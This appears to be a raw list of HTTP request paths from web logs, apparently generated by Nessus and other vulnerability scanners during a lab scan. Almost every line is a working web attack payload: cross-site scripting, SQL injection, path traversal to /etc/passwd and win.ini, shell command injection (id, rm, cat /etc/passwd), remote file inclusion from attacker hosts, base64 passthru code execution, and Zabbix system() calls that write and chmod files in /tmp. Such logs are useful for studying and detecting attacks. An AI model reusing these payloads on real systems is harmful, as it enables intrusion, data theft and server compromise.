src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/servlets/servlet/mmstdod.cgi?alternate_templates=| echo \"content-type: text/html\";echo \"\" ; id\\x00\n/javascript/gfx.exe\n/main.php?stuff='&uname >q78458992 #\n/mail.php?id='/**/union/**/select/**/1,2,1331904244,4--&blog=1\n/scripts/cdjnwtwnqga1.pl\n/help.php?q=\"&rm\\xa0q93363383&rem\\xa0\n/examples/jsp/sessions/www/delivery/ac.php?bannerid=-1331904367+or+1=1+--+';passthru(base64_decode($_server[http_nessus_rvrxehcs]));die;/*\n/examples/jsp/num/error.php?selected_theme=<script>alert(uebimiau_selected_theme_xss.nasl)</script>\n/mod_membre/inscription.php?chemin=http://192.168.202.118:8080/tzhfyzkbomspvm??\n/tinybrowser/upload.php?badfiles=1><script>alert('tinybrowser_multiple_xss.nasl')</script>\n/d5a5renl.mscgi?<script>cross_site_scripting.nasl</script>\n/manager/script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine=</option></select><?phpinfo();?>\n/examples/jsp/cal/help/index.php?help_file=../../../../../../../../../../../etc/passwd\n/examples/jsp/jsp2/el/newsdesk.cgi?t=../../../../../../etc/passwd\n/scripts/htsearch?exclude=`/etc/passwd`\n/help.php?q=\"ping\\x0b-w\\x0b11000\\x0b-n\\x0b1\\x0b4.3.2.1|rem\\x0b\n/main.php?logout=ping;-w;10000;-n;1;1.2.3.4|rem;\n/scripts/lrn28issfuqi.cfm\n/cgi-local/fileseek2.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=\n/top.php?stuff=|ping;-w;10000;-n;1;1.2.3.4|rem;\n/scripts/xuicksry9grj.pl\n/javascript/urls.exe\n/javascript/links.exe\n/main.php?logout=;del q35486244 #\n/scripts/default.asp?istate=duclassmate_sql_injections.nasl'&nstate=utah\n/examples/jsp/checkbox/index.php?id=urjhxcl19w'\n/examples/jsp/jsp2/el/menu_dx.php?site_path=../../../../../../../../../../etc/passwd\\x00\n/scripts/1331904202-ror_session_fixation.nasl\n/javascript/sent.exe\n/iajtej82.cfm?<script>cross_site_scripting.nasl</script>\n/j4drbkil.exe?<script>cross_site_scripting.nasl</script>\n/q703m78q.nsf?<script>document.cookie=\"testvowq=604;\"</script>\n/javascript/htpasswd.bat\n/javascript/logos.exe\n/scripts/app_and_readme/navigator/index.php?page=http://192.168.202.96:8080/swgnhpydbq0t?\n/jnv890lt.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/opensiteadmin/scripts/classes/loginmanager.php?path=http://192.168.202.118:8080/ghl9il?\\x00\n/scripts/editor/filemanager/connectors/php/upload.php?command=fileupload&type=file&currentfolder=/fckeditor_currentfolder_file_upload-1331919015.php.\n/eg2u8pbv.x?<script>cross_site_scripting.nasl</script>\n/en-us/account?username=\"<script>foo</script\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('/./tmp/jdvccfaqtd0+>+/dev/null+&').\"]=1\n/scripts/index.php?board=nonexistant1756924400\n/scripts/vhost.php?action=logout&time=1331923137\n/help.php?q=\"\\x0dsleep\\x0910\\x09#\n/1r8cfrlf.cgi?<meta http-equiv=set-cookie content=\"testydan=5106\">\n/ghswfouu.x?<script>document.cookie=\"testsqmm=5713;\"</script>\n/bxnyrhmh.do?<meta http-equiv=set-cookie content=\"testmjct=1867\">\n/phpmyadmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../\n/3j8echh0.mscgi?<meta http-equiv=set-cookie content=\"testfuqi=4189\">\n/examples/jsp/num/?\"><script>alert('struts_sa_surl_xss.nasl')</script>\n/en-us/s7qus4g3.aspx?<script>cross_site_scripting.nasl</script>\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+68+c0+a8+ca+66+68+02+00+d4+20+8b+dc+6a+10+53+55+ff+d0+83+c4+2c+95+59+5a+51++>>ctdn\n/fa8p8lr8.cfm?<script>cross_site_scripting.nasl</script>\n/en-us/n9xlumt5.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/yef5f3d5.cgi?<script>document.cookie=\"testcrcv=6167;\"</script>\n/examples/jsp/error/autohtml.php?op=modload&mailfile=x&name=../../../../../../../../etc/passwd\n/scripts/configuration/galleryconfig.txt\n/top.php?stuff=rm;q44566983&rem;\n/bl8sefdm.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff=\"&ping;-w;11000;-n;1;4.3.2.1&rem;\n/include/scripts/export_batch.inc.php?dir=@rfiurl\n/en-us/account/index.php?name=your account&profile=anyone\"><script>alert('nessus was here');</script>\n/javascript/protect.exe\n/people's_park/\n/examples/jsp/jsp2/el/news.php?prevnext=1'phpnews_prevnext_sql_injection.nasl\n/phpmyadmin/lib/dbman_filter.inc.php?lib_path=/etc/passwd\\x00\n/opensiteadmin/scripts/classes/form.php?path=http://192.168.202.96:8080/txenjrxf3?\\x00\n/scriptedfeed_small/\n/top.php?stuff=;sleep\\x099\\x09#\n/l4fz1dqw.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/search.jsp?q=%\"<script>alert(1331904190)</script>\n/mambots/editors/path/jscripts/tiny_mce/plugins/preview/preview.php?mosconfig_absolute_path=@rfiurl\n<script>cross_site_scripting.nasl</script>\n/g3w7y7u5.asp?<meta http-equiv=set-cookie content=\"testbfpq=3326\">\n/eei78ore.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/w4996nr0.html?<script>document.cookie=\"testttvs=7163;\"</script>\n/ybz5rz7a.jsp?<script>document.cookie=\"testsbvw=6289;\"</script>\n/um7xpn15.htm?<script>document.cookie=\"testotoy=6142;\"</script>\n/javascript/res.exe\n/javascript/viewforum.exe\n/ybz5rz7a.cgi?<meta http-equiv=set-cookie content=\"testsbvw=6289\">\n/?<meta http-equiv=set-cookie content=\"testsory=7676\">\n/manager/sawmillcl.exe?ho+{complete_version}\n/manager/search.jsp?q=%\"<script>alert(1331904374)</script>\n/8t9v8k7x.nsf?<meta http-equiv=set-cookie content=\"testhvje=9403\">\n/en-us/odzk29aa.jspa?<meta http-equiv=set-cookie content=\"testtfvh=2141\">\n/demo/ms-pe02/catalog.php?cid=0&sid='\"&sortfield=title&sortorder=asc&pagenumber=1&main=http://192.168.202.118:8080/moclyxlwqyfjnp?&\n/help.php?q=\"&rm q26584324&rem \n/j4oqyvga.exe?<script>cross_site_scripting.nasl</script>\n/nyjgaorz.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/manager/admin/top.php?admindir=/etc/passwd\\x00\n/examples/jsp/sessions/ovlaunch.exe\n/fa8p8lr8.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/index.php?src=1&_common=1&time=1332008335&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\\x00\n/gy23xnjq.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/recordings/themes/program/themesettings.inc.php?themesdir=/etc/passwd\\x00\n/logbook.pl?file=../../../../../../../bin/cat /etc/passwd\\x00|\n/test.php?<script>alert('vulnerable')</script>=x\n/subscriptions.tar.bz2\n/help.php?q=\"ping -w 9000 -n 1 4.3.2.1|rem \n/zv8tv7h8.htm?<script>document.cookie=\"testcqwz=9752;\"</script>\n/top.php?stuff=\"\\x0duname >q93764844 #\n/cgi-bin/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=\";echo ''; echo `id `;die();echo\"\n/scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331919142&lang_crm=../../../../../../../../../../../..//boot.ini\\x00\n/examples/jsp/checkbox/index.php?action=view&filename=../../../../../../../../../../../../../etc/passwd\n/yver8r9o.mscgi?<script>cross_site_scripting.nasl</script>\n/main.php?logout=\";rm q32339726 #\n/phpmyadmin/starnet/addons/slideshow_full.php?album_name='1393616211\n/men's health/\n/javascript/enterprise.exe\n/examples/jsp/error/webplus?script=/../../../../etc/passwd\n/help.php?q=\"ping;-w;9000;-n;1;4.3.2.1&rem;\n/myphpnuke/links.php?op=search&query=[script]alert('vulnerable);[/script]?query=\n/main.php?stuff=';sleep 11 #\n/ows-bin/gw5/gwweb.exe?htmlver=aaa&get-context\n/help.php?q=\"\\x0drm q66781813 #\n/main.php?stuff=\"ver >q53176124&rem \n/zqqemp6j.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cacti/index.php?page=documents&doc=-99' union select null,null,'nessus','dcpportal_sql.nasl',null,null,null,null,null,null,null,null--\n/javascript/bsd.exe\n/3j8echh0.exe?<meta http-equiv=set-cookie content=\"testfuqi=4189\">\n/javascript/jsso.exe\n/examples/jsp/error/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331904435\n/en-us/account/athenareg.php?pass= ;id\n/main.php?stuff='&del\\x09q13569746\\x09#\n/help.php?q=\"&rm\\x0cq17127645&rem\\x0c\n/examples/jsp/cal/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904454,1014388214 -- \n/bin/ion-p?page=../../../../../etc/passwd\n/examples/jsp/cal/index.php?name=your account&profile=anyone\"><script>alert('nessus was here');</script>\n/en-us/oie504mr.fts?<script>document.cookie=\"testtpby=7052;\"</script>\n/byrg33fw.jsp?<meta http-equiv=set-cookie content=\"testexuu=5340\">\n/main.php?stuff=\";uname >q85142671 #\n/awstats/awstats.pl?migrate=|echo;echo x;echo|awstats342967.txt\n/help.php?q=ver >q77858339&rem \n/login.asp?ret_page=a\"><script>alert('wvs-xss-magic-string-413155588079')</script><\"\n/ht8pn8uq.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\nftp://192.168.23.253/*<apache_mod_proxy_ftp_glob_xss.nasl>\n/examples/jsp/jsp2/jspx/www/delivery/fc.php?max_type=../../../../../../../../../../etc/passwd\\x00\n/?<script>document.cookie=\"testuhsv=9753;\"</script>\n/main.php?stuff='\\x0drm\\x09q12818567\\x09#\n/examples/jsp/jsp2/jspx/starnet/addons/slideshow_full.php?album_name='1714179239\n/help.php?q=\"|ping\\x09-w\\x099000\\x09-n\\x091\\x091.2.3.4|rem\\x09\n/kinderstartoct27transcript/\n/d5a5renl.php?<script>cross_site_scripting.nasl</script>\n/ap58k3ci.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/soaprouter.exe\n/examples/jsp/checkbox/nph-mr.cgi?do=loginhelp&configlanguage=../../../../../../../etc/passwd\\x00\n/cgi-bin/../../../../../../../windows/ping.exe 127.0.0.1\n/scripts/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=3v2hcyy5ip4u7nhpw\n/help.php?q=\"del\\x09q34493999&rem\\x09\n/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=http://192.168.202.96:8080/no4ghqiguzhst??\n/examples/jsp/cal/autohtml.php?op=modload&mailfile=x&name=../../../../../../../../etc/passwd\n/htbin/pfdispaly.cgi?'\\x0a/bin/cat /etc/passwd|'\n/module/forum/forum.php?fd=http://192.168.202.96:8080/4dckqcc0acprbz?=';\n/cacti/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331909312',null,null,null,null --\n/examples/jsp/error/print.php?what=article&id='\n/top.php?stuff=&uname\\x09>q97149498\\x09#\n/javascript/document.asp\n/?<script>document.cookie=\"testvlau=8517;\"</script>\n<script>document.cookie=\"testkgqo=204;\"</script>\n/examples/jsp/cal/home/search.asp?nchannel='1\n/scripts/qop0sa1auif9.cfm\n/top.php?stuff=\"|ping -w 7000 -n 1 4.3.2.1|rem \n/?<meta http-equiv=set-cookie content=\"testiklc=904\">\n/i2n4v4rl.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/ui/login?user=nessus-1331904192\n/scripts/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331905213,113095511 -- \n/examples/jsp/num/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd\n/jnt3f86c.nsf?<meta http-equiv=set-cookie content=\"testcmax=9270\">\n/qczkquis.html?<meta http-equiv=set-cookie content=\"testkwlg=5591\">\n/help.php?q=\"ver&rem\\x09\n/raanw4ia.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/account/php.cgi?/etc/passwd\n/phpmyadmin/documentation.html?phpmyadmin=map47fckapd3c2j9d7svslcjakhdm1fs' or (sleep(4)+1) limit 1 -- \n/examples/jsp/colors/index.php?act=arcade&do=stats&gameid=1'\n/d'azzardo/\n/examples/jsp/colors/search.cgi?..\\..\\..\\..\\..\\..\\windows\\win.ini\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+ctdnu.com>hwglk+||+echo+\n/main.php?logout=\"&ver&rem\\xa0\n/wag the dog script/\n/aspscript/\n/phpmyadmin/documentation.html?phpmyadmin=\\xbf'\\xbf\"\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('/bin/echo+-en+\"\\0174\\0044\\0000\\0377\\0347\"+>>+/tmp/hwmxmkxsji0;').\"]=1\n/main.php?stuff=\"ping\\x09-w\\x0910000\\x09-n\\x091\\x091.2.3.4&rem\\x09\n/main.php?stuff=ping;-w;7000;-n;1;1.2.3.4|rem;\n/odzk29aa.dll?<script>document.cookie=\"testtfvh=2141;\"</script>\n/jnv890lt.html?<script>cross_site_scripting.nasl</script>\n/main.php?stuff=\"&del\\x09q48424932&rem\\x09\n/7uz3ok60.jspa?<script>cross_site_scripting.nasl</script>\n/82q7ywa8.cfc?<script>document.cookie=\"testpwew=1315;\"</script>\n/scripts/whois.cgi?action=load&whois=;id\n/examples/servlets/servlet/contrib/forms/evaluation/c_formevaluation.class.php?fileroot=/etc/passwd\\x00\n/magazine (men's health)/\n/scripts/spt--forumtopics.php?forumid=-9 union select null,null,null,1331909422,4,5\n/examples/jsp/jsp2/jspx/include/doc/get_image.php?lang=en&img=../../../../../../../../../../etc/passwd\n/search.php?q=<script>alert('wvs-xss-magic-string-414206083542')</script>&mode=apparel\n/top.php?stuff=\"del\\x0cq97119121&rem\\x0c\n/v3axg1p8.jsp?<script>document.cookie=\"testxagh=6987;\"</script>\n/what'snew/\n/javascript/.htpasswd.sfish/sfish%dn%dn%dn%dn%dn%dn%dn%dn\n/scripts/search.cfm\n/t3af3tdz.php3?<script>cross_site_scripting.nasl</script>\n/y8pmygrp.idc?<script>cross_site_scripting.nasl</script>\n/scriptru/\n/h5sc3gxy.html?<script>cross_site_scripting.nasl</script>\n/1r8cfrlf.cfm?<meta http-equiv=set-cookie content=\"testydan=5106\">\n/bl8sefdm.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/checkbox/admin/configset.php?settings_dir=/etc/passwd\\x00\n/scripts/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,841172808568,4,5,6,7,8,9,10,11--\n/examples/jsp/error/pals-cgi?palsaction=restart&documentname=/etc/passwd\n/main.php?stuff=\"&del q23549573 #\n/en-us/ddoworrl.nsf?<script>document.cookie=\"testvlau=8517;\"</script>\n/phpmyadmin/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor\n/viruses'/\n/main.php?stuff=\"|ping;-w;10000;-n;1;4.3.2.1|rem;\n/examples/jsp/checkbox/texis.exe/?-dump\n/w4996nr0.php3?<script>document.cookie=\"testttvs=7163;\"</script>\n/main.php?logout=\"uname\\x09>q68293964\\x09#\n/javascript/mac.exe\n/cgi-bin/index.php?entry='\n/iajtej82.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/err.exe\n/d765w06j.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=3lm8lum3iwm2odllf\n/tuwjta1w.pl?<script>document.cookie=\"testpokn=7494;\"</script>\n/j4oqyvga.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/de3v2dd9.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/el/faq.php?action=&type=view&s=&id=-1' union select 0,1687881655,0,0,0,0,0--\n/en-us/<script>cross_site_scripting.nasl</script>.jsp\n//<body><script/src=\"http://www.example.com/test?rnd=q89311766\"></script>\n/main.php?stuff=\"&ver&rem,\n/en-us/account/js/vendors.php?file=../../../../../../../../../../etc/passwd\\x00nessus.js\n/examples/jsp/num/squirrelcart/cart_content.php?cart_isp_root=/etc/passwd\\x00\n/if69ddo1.mscgi?<script>document.cookie=\"testiabz=5220;\"</script>\n/scripts/xtextarea.scr.php?globals[pth][spaw]=http://192.168.202.118:8080/ghl9il??\n/examples/jsp/error/ovlaunch.exe\n/main.php?stuff=\"\\x0drm q12524199 #\n/search.jsp?q=%\"<script>alert(1331904224)</script>\n/regsyssubscriptioncnt/\n/top.php?stuff='\\x0duname\\x09>q15742122\\x09#\n/help.php?q=\"del\\xa0q88986355&rem\\xa0\n/phpmyadmin/scp.dll/sendto?template=../../../../../../../../../../../../boot.ini\\x00gwextranet_template_dir_traversal.nasl\n/main.php?logout=ver,>q38131719&rem,\n/bn857frh.jsp?<script>cross_site_scripting.nasl</script>\n/examples/jsp/colors/snpfiltered.pl?t=c&u=<script>foo</script>\n/wps/wcm/webinterface/login/login.jsp?\"><script>alert(\"ibm_login_qs_xss.nasl-1332010414\")</script>\n/readmore.php?config[\"sipssys\"]=http://192.168.202.118:8080/ghl9il?\n/mcdonald's/\n///../../../../../../../..windows/win.ini\n/scripts/cxvae_g3rjys.cgi\n/examples/jsp/jsp2/jspx/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904458','5'--\n//../../../../../../../../../../boot.ini\n/help.php?q=\"sleep 10 #\n/main.php?stuff=\"&uname\\x09>q71999354\\x09#\n/..%2f..%2f..%2f..%2f..%2f../winnt/repair/sam._\n/scripts/prnnucptkixl.cfm\n/jw64yq8u.dll?<meta http-equiv=set-cookie content=\"testylfu=1313\">\n/cgi-bin/eshop.pl/seite=;cat eshop.pl|\n/scripts/1331918878-ror_session_fixation.nasl\n/javascript/2001.exe\n/edzaia0i.aspx?<script>cross_site_scripting.nasl</script>\n/search?ns-query-pat=../../../../../../../../../etc/passwd\n/main.php?logout='\\x0adel q82997141 #\n/examples/jsp/sessions/include/error/autherror.cfm?errorcode=1&ftvar_linkp=\"></a><script>alert('fusetalk_mult_xss.nasl')</script><a href=\"\n/q703m78q.dll?<script>document.cookie=\"testvowq=604;\"</script>\n/vwmg565s.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/5o9zq43e.aspx?<script>cross_site_scripting.nasl</script>\n/bmeun223.kspx?<script>document.cookie=\"testhhwu=7044;\"</script>\n/main.php?stuff=';uname\\x09#\n/iktok2bw.x?<script>cross_site_scripting.nasl</script>\n/main.php?stuff=\"del;q96628225&rem;\n/scripts/index.php?edit=nonexistant846876774\n/esmozg5d.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/jnv890lt.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/recordings/home/search.asp?nchannel='1\n/help.php?q=\"|ping;-w;9000;-n;1;1.2.3.4|rem;\n/examples/jsp/jsp2/jspx/insertorder.cfm?cfid=1&cftoken=1 union select 1,2,3,4,storename,6,7,8,9,10,11,12,13,14,15 from params\"having 1=1\n/recordings/index.php?show=../../../../../../../../../../../etc/passwd\\x00\n/examples/jsp/checkbox/mlog.html?screen=/etc/passwd\n/_mem_bin/..\\xe0\\x80\\xaf..\\xe0\\x80\\xaf..\\xe0\\x80\\xaf..\\xe0\\x80\\xaf..\\xe0\\x80\\xaf../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/jw64yq8u.kspx?<meta http-equiv=set-cookie content=\"testylfu=1313\">\n/en-us/account/sgdynamo.exe?htname=sgdynamo.exe\n/frontend/x3/htaccess/dohtaccess.html?dir=><script>alert(413035588065)</script>\n/en-us/w4996nr0.dll?<meta http-equiv=set-cookie content=\"testttvs=7163\">\n/phpmyadmin/store.php?crn=42'&action=show&show_products_mode=cat_click\n/scripts/index.php?album=../../../../../../../../../../etc/passwd\\x00\n/miz4r5hz.asp?<script>document.cookie=\"testviqu=1270;\"</script>\n/examples/jsp/checkbox/index.php?_language=../../../../../../../../../../etc/passwd\\x00\n/scripts/mail.php?id='/**/union/**/select/**/1,2,1331919012,4--&blog=1\n/s7qus4g3.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/colors/www/delivery/ac.php?bannerid=-1331904368+or+1=1+--+';passthru(base64_decode($_server[http_nessus_ufeyvofb]));die;/*\n/javascript/axis-admin.exe\n/javascript/logon.exe\n/top.php?stuff=\"\\x0duname >q38313114 #\n/n9xlumt5.dll?<script>cross_site_scripting.nasl</script>\n/scripts/viewcat.asp\n/examples/servlets/servlet/libraries/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/using logon scripts figure 11102332757725/\n/recordings/login.php?lang=/../../../../../../../../../../../../etc/passwd\\x00.txt\n/script of the bridge/\n/main.php?logout=\"\\x0drm q69325217 #\n/en-us/account/myevent.php?myevent_path=/etc/passwd\\x00\n/examples/jsp/error/sysinfo.cgi?action=systemdoc&name=sysinfo_name_cmd_exec.nasl;id\n/javascript/aggrespy.exe\n/scripts/month.php\n/r3le3om5.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/num/calendar_admin.pl?config=|cat /etc/passwd|\n/dvscript/\n/gvx7m5ti.php3?<script>document.cookie=\"testwldz=3506;\"</script>\n/main.php?logout=\"&del\\x09q22899423\\x09#\n/cgi-bin/c32web.exe/changeadminpassword\n/recordings/file.cgi?name=/eventcache/../../../../../../../../../../../boot.ini\n/examples/jsp/jsp2/el/upgrade/index.php?steporder[]=../../../../../../../../../../../../etc/passwd\\x00\n/javascript/document.cfg\n/main.php?stuff=\"&uname\\x09>q54676593\\x09#\n/scripts/pfdispaly.cgi?'\\x0a/bin/cat /etc/passwd|'\n/en-us/7o5qp766.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.26.202/&frm_user=&scr_height=&scr_width=q26976897\n/javascript/ss.exe\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('chmod+555+/tmp/pxvobegahd0;').\"]=1\n/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331919198\n/lmw4r201.kspx?<meta http-equiv=set-cookie content=\"testwews=8477\">\n/admin/index.php?path_to_script=http://192.168.202.96:8080/txenjrxf3??&cmd=ls\n/scripts/album.pl?function=about\n/admin.php?style=../robots.txt\\x00&language=ircrash\n/javascript/~amanda.exe\n/help.php?q=\"&ver >q31935143&rem \n/examples/jsp/colors/admin/general.php?mode=perlinfo&config[general][perl_binary]=cat /etc/passwd||\n/newshour-transcript/\n/javascript/hardware.exe\n/scs86g1p.do?<script>document.cookie=\"testquyx=2820;\"</script>\n/fa8p8lr8.jspa?<script>cross_site_scripting.nasl</script>\n/main.php?stuff=';uname #\n/en-us/9kr0ih0v.php3?<script>document.cookie=\"testzgnm=1183;\"</script>\n/xfkun1ku.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/8x6w469u.html?<script>document.cookie=\"testgfjr=1286;\"</script>\n/scripts/search/show.pl?url=file:/etc/passwd\n/scripts/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1332010409')</script>\n/main.php?stuff=\"&del,q14633268&rem,\n/help.php?q=\";rm\\x09q32988845\\x09#\n/admin/news.admin.php?path_to_script=http://cirt.net/rfiinc.txt??&cmd=ls\n/169okeyj.cgi?<meta http-equiv=set-cookie content=\"testxeoi=3573\">\n/main.php?stuff=\"&uname >q52846748 #\n/0z575z74.cgi?<script>document.cookie=\"testuhsv=9753;\"</script>\n/script/template/index.php?main_page_directory=http://192.168.202.118:8080/zz5thkvtmlgl?\n/cgi-914/pfdispaly.cgi?'\\x0a/bin/cat /etc/passwd|'\n/?<meta http-equiv=set-cookie content=\"testfuqi=4189\">\n/help.php?q=\"|ping -w 7000 -n 1 4.3.2.1|rem \n/main.php?logout=\"|ping\\x09-w\\x097000\\x09-n\\x091\\x091.2.3.4|rem\\x09\n/koma-script/\n/fa8p8lr8.cgi?<script>cross_site_scripting.nasl</script>\n/cgi-bin/yabb.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd\\x00\n/cgi-bin/pollit/poll_it_ssi_v2.0.cgi?data_dir=/etc/passwd\\x00\n/bzuf9ozq.fts?<script>cross_site_scripting.nasl</script>\n/examples/servlets/servlet/bemarket/shop/index.php?pageurl=viewpage&filename=../../../../../../../../../../../../../../etc/passwd\n/scripts/pfdispaly.cgi?../../../../../../etc/passwd\n/main.php?stuff=&rm;q26155749&rem;\n/javascript/.passwd.cfg\n/scripts/qop0sa1auif9.asp\n/scripts/services/help/?module=horde&show=about\n/o35zot2r.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/9o6g5vkn.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/mv8wxfy9.php?<script>document.cookie=\"testrhbc=8184;\"</script>\n/cgi-914/c32web.exe/changeadminpassword\n/m5103snj.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/\\x80../\\x80../\\x80../\\x80../\\x80../\\x80../windows/win.ini\n/g3w7y7u5.aspx?<script>document.cookie=\"testbfpq=3326;\"</script>\n/pyscriptableeditor-1/\n/zmvq66jy.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/n9xlumt5.asp?<script>cross_site_scripting.nasl</script>\n/en-us/33y9gcqq.jsp?<script>document.cookie=\"testnvxc=4301;\"</script>\n/scripts/agenda.php3\n/zroo33l4.htm?<meta http-equiv=set-cookie content=\"testiklc=904\">\n/bb-hostsvc.sh?hostsvc=../../../../../etc/passwd\n/main.php?stuff=\"del\\x0bq47639929&rem\\x0b\n/examples/jsp/error?username=\"<script>foo</script\n/yef5f3d5.idc?<meta http-equiv=set-cookie content=\"testcrcv=6167\">\n/script/index.php?path_inc=http://192.168.202.118:8080/2aibfaczmac8?\n/javascript/msadm.exe\n/main.php?stuff=uname >q12553358 #\n/um7xpn15.asp?<meta http-equiv=set-cookie content=\"testotoy=6142\">\n/javascript/dbman.exe\n/examples/jsp/num/cal_make.pl?p0=../../../../../../../../../etc/passwd\\x00\n/odzk29aa.cgi?<meta http-equiv=set-cookie content=\"testtfvh=2141\">\n/examples/servlets/servlet/webadmin.php?show=/etc/passwd\n/manager/backend/classes.php?include_path=../lib/jinzora.js\\x00\n/en-us/s7qus4g3.pl?<script>cross_site_scripting.nasl</script>\n/examples/jsp/checkbox/pwcgi/smpwservicescgi.exe?target=http://www.nessus.org\n/edv3mapy.jspa?<script>cross_site_scripting.nasl</script>\n/7uz3ok60.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/<meta http-equiv=set-cookie content=\"testwhac=3130\">\n/examples/jsp/colors/sgdynamo.exe?htname=<script>foo</script>\n/javascript/cvs.exe\n/help.php?q=|ping;-w;9000;-n;1;1.2.3.4|rem;\n/examples/jsp/cal/ion-p.exe?page=../../../../../etc/passwd\n/examples/jsp/jsp2/jspx/catalog.php?action=category_show&id='\n/u8yiqilu.cfm?<script>document.cookie=\"testswjp=6010;\"</script>\n/recordings/sysinfo.cgi?action=systemdoc&name=sysinfo_name_cmd_exec.nasl;id\n/examples/jsp/cal/showcat.php?cat=1'\n/mpcgi/windmail.exe\n/javascript/testimonial.exe\n/eg2u8pbv.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/bin/.passwd\n/examples/jsp/colors/main.php?g2_view=zipcart.download&g2_file=../../../../../../../../../../../../etc/passwd\n/main.php?stuff='&uname\\x09>q84519525\\x09#\n/javascript/.passwd.conf\n/javascript/htpasswd.gz\nftp://192.168.22.203/*<apache_mod_proxy_ftp_glob_xss.nasl>\n/subscriptions.cc\n/h4bi26jd.php3?<script>document.cookie=\"testhrzx=1150;\"</script>\n/scripts/index.php?op=default&date=200607' union select 1,204130911,1,1,1,1,1,1,1,1--&blogid=1\n/help.php?q=\"ping,-w,10000,-n,1,4.3.2.1&rem,\n/phpmyadmin/search.php?submit=true&search=');\n/comments.php?scriptpath=http://192.168.202.118:8080/zz5thkvtmlgl??\n/kerckhoffs'_principle/\n/top.php?stuff=\"&ver;>q62612992&rem;\n/javascript/tools.exe\n/eei78ore.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/admin/ip_manage.php\n/bn857frh.kspx?<script>cross_site_scripting.nasl</script>\n/raanw4ia.idc?<script>cross_site_scripting.nasl</script>\n/ows-bin/view_item?html_file=../../../../../../../../../../etc/passwd\\x00\n/scripts/..5c2e./winnt/system32/cmd.exe?/x+/c+copy \\winnt\\system32\\cmd.exe ck8pj.exe\n/cgi-914/.htpasswd\n/scripts/2sfdqydfaknx.cfm\n/examples/jsp/sessions/starnet/modules/sn_allbum/slideshow.php?cmsdir=/etc/passwd\\x00\n/javascript/contest.exe\n/phpmyadmin/pals-cgi?palsaction=restart&documentname=/etc/passwd\n/main.php?stuff=\"&rm q52846748 #\n/jujgxwav.idc?<meta http-equiv=set-cookie content=\"testknim=9383\">\n/examples/jsp/sessions/shopaddtocart.asp?productid='42\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('chmod+777+/tmp/lhmpvdjfem.sh').\"]=1\n/dslpwt15.mscgi?<meta http-equiv=set-cookie 